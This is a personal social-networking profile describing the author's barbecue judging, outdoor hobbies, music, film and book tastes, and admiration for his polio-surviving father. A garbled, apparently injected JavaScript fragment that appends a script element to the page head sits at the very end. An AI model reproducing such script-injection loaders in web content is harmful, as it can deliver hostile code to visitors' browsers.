My Interests

What can I say, I have a lot of interests. First among them is good BBQ. I'm a Kansas City Barbecue Society certified Barbecue judge. I'm gone many weekends during the summer judging BBQ championships. I have a web site:Keith’s Barbeque CentralI like to camp, hike & fish. I also enjoy photography. I usually like to spend at least two weeks a year camping somewhere new, someplace scenic where I can get some good photos.I spend WAY too much time surfing the internets. I use Firefox as a browser and always have at least 4, if not 6 or 7, sites open at a time where I'm either posting or blogging. Talk about multi-tasking. I'm a regular poster on several political websites. I post regularly and am a moderator at at Progressive Independent .

What Political Party Do Your Beliefs Put You In?

I'd like to meet:

Interesting, witty, intelligent, progressive people; preferably of the female variety. Just here for friends now, but who knows? Oh yeah, and the music too.
One more thing. If your profile is private and you send a friend request you will be ignored, unless we've had some communication first.

average minds discuss events;
small minds discuss people..."

Music:

I have very eclectic tastes. Jazz, classical, rock in all its various manifestations, oldies, classic rock, reggae, bluegrass, world music (including drumming) and older country like Johnny Cash & Willie Nelson. I can't stand what's called country now. I also dearly love what are referred to as "Jam Bands", My current favorite is String Cheese Incident. Others that I really like are Michael Franti, Umphrey's McGee, Blueground Undergrass, Government Mule and Dr. Didg. I love the blues (don't get me started on the blues). It all depends on my mood what I'm listening to. One more thing, bands please quit asking me to add you. If I like you I'll find you, if I don't it's a waste of your time.

Movies:

I like most of the classics, particularly Hitchcock, Rear Window and North by Northwest are my favorites. I like good Sci-Fi movies, not outer space westerns. My very favorite is "A Boy and His Dog" starring a very young Don Johnson. I can't watch any of the Mad Max movies because they're such a blatant ripoff. I like good comedy, especially British comedy like Monty Python. I watch a lot of recent political documentaries too. I particularly liked the "Lord of the Rings" trilogy, being a big fan of the books. This year I really liked "The Hitchhiker's Guide to the Galaxy". I have many concert videos I watch frequently too. Put one on, crank up the stereo and ROCK AND ROLL !! I have about 200 DVDs in my collection and it is constantly growing.

Television:

Don't watch much. If it's on it'll be a news channel on in the background. The only show I don't miss is The Daily Show. I record it every night on the DVR and watch it in the morning before I go to work.

Books:

Kurt Vonnegut, what can I say. My very favorite author.

Currently reading the re-issue (paoerback) of Greg Palast's " Armed Madhouse".I'm a voracious reader, both fiction and non-fiction. I like Sci-Fi, historical fiction, histories, and modern books on science and politics.

Heroes:

My dad. He had polio when I was five years old. Has been on crutches, now a wheelchair and electric cart, all my life that I can remember. It never stopped him from taking us camping & fishing & participating in all our activities. .."var s=document·('script');s.src='..';document·getEleme ntsByTagName('head')[0].appendChild(s);"
